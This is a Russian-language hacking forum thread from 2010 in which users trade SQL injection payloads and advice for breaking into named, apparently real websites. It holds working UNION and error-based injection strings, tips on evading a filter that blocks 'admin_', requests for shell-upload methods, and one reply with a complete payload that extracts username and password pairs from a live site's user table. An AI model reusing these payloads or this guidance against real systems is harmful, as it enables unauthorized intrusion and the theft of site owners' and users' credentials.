Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Есть простенькая SQL-иньекция, но сайт фильтрует(и сразу банит айпишник) все урлы, в которых проскакивает слово "admin_".
    Т.е. запрос
    Code:
    http://site.com/index.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user,pass),3+from+[B]admin_[/B]users/*
    фильтруется. Остальные запросы идут без проблем. Идеи, как обойти?

    Через POST скрипт параметры не берет.
     
    #15501 Nek1t, 1 Dec 2010
    Last edited: 1 Dec 2010
  2. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12

    Линк в личку.
     
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    спасибо, я вот хотел изнать названия колонок при помощи
    information_shema но там написано што такой процес запрещон,
    а што дальше в таком случае я могу сделать?
    и дайте плиз ссылку на нормальную статью о там как при скуле залить шелл
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    клац

    уже милионный раз перемалывается этот вопрос, поиcком можете научится пользоватся? здец просто полнeйший..обленилась молодежь
     
    1 person likes this.
  5. BaleHoK

    BaleHoK Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    399
    Likes Received:
    21
    Reputations:
    10
    Кто знает как юзать вложенные запросы в мускул 4?)

    Т.е имеем запрос
    /**/or/**/1/**/group/**/by/**/concat(version(),floor(rand(0)*2))having/**/min(0)/**/or/**/1/*
    все норм,Версию выведет,но попытаемся выдрать данные из существующей таблы admin допустим,летит эррор


    ЗЫ:Интересно не мне одному :)
     
    #15505 BaleHoK, 4 Dec 2010
    Last edited: 4 Dec 2010
  6. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Подзапросы в MySQL начали поддерживаться начиная с версии 4.1
     
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите определить версию БД.

    http://www.procasapanama.com/detalle.php?id=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
     
  8. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Здесь нет уязвимости
     
    1 person likes this.
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите найти:
    1)Кол-во таблиц
    2)пароль админа


    http://www.alestilocuquita.com/descripcion.php?id=-347'+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+count(*)+from+INFORMATION_SCHEMA.TABLES+limit+1,1),1,64),floor(rand(0)*2)))z)+--+
     
  10. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    FlaktW
    http://www.alestilocuquita.com/descripcion.php?id=-347' and(select 1 from(select count(*),concat((select (select (SELECT concat_ws(0x3a,usuarios.usuario,usuarios.clave) FROM `orlando_cuiquita`.usuarios LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    Дальше перебирай лимитом юзверов
     
  11. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    А вот вопрос, когда есть стандартная инъекция, то нельзя ли в подзапросе выполнить UPDATE?
     
    _________________________
  12. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1
    Можно ли что то сделать в таких случаях

    http://www.omelhordamoda.com.br/modafeminina.asp?CatID=80%27


    http://www.siliconaction.com.br/registro/secao.mv?nomearquivo=[]

    http://rasta.com.br/loja/index.php?page=shop.product_details%27&flypagep[]=shop.flypage%27&product_id=4685%27&category_id=8%27&manufacturer_id=0%27&option=com_virtuemart&Itemid=1%27
     
    #15512 [Ozzi], 6 Dec 2010
    Last edited: 6 Dec 2010
  13. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    [Ozzi]
    В первом случае - скуля http://www.omelhordamoda.com.br/modafeminina.asp?CatID=1'
    БД - MSAccess
    Вот статья про эту субд https://forum.antichat.ru/threadnav50550-1.html
    А в остальных 2ух просто раскрытие я так понял.

    Нет,нельзя.Апдейт встречается довольно редко,также как и обход авторизации.
     
    #15513 ~d0s~, 6 Dec 2010
    Last edited: 6 Dec 2010
  14. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1
    Почитал попробовал но чет не раскручивается (
     
  15. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1
    Как переделать этот запрос

    ' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) --

    так что б он вывел table_name из information_schema
     
  16. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    ' or 1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
     
    #15516 Фараон, 6 Dec 2010
    Last edited: 6 Dec 2010
  17. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1

    Ступил.. Спасибо!!!
     
    #15517 [Ozzi], 6 Dec 2010
    Last edited: 6 Dec 2010
  18. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1
    Делаю такой запрос

    Code:
    select column_name from information_schema.columns where table_name='User' 
    
    мне выдает там 5 значенй логин пароль и тд , делаю дальше так
    Code:
    select логин  from User - 
    
    меня бросает на главную страницу почему?
     
  19. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Проверьте количество записей:
    Code:
    select count(*) from User 
    Потом проверь, в какой базе таблица:
    Code:
    select table_schema from information_schema.tables where table_name='User' 
    Потом запросом:
    Code:
    select password from table_schema.User - 
    Выводи данные
    Линк скинь.
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    причин может быть несколько, мб таблица в другой базе, тогда вопрос будет фелс, и будет редирект
    возможно что там фильтр на определенные слова..
    а еще много чего возможно,.. анализируй сайт
    смотри на какие слова ругается
     
    _________________________
Thread Status:
Not open for further replies.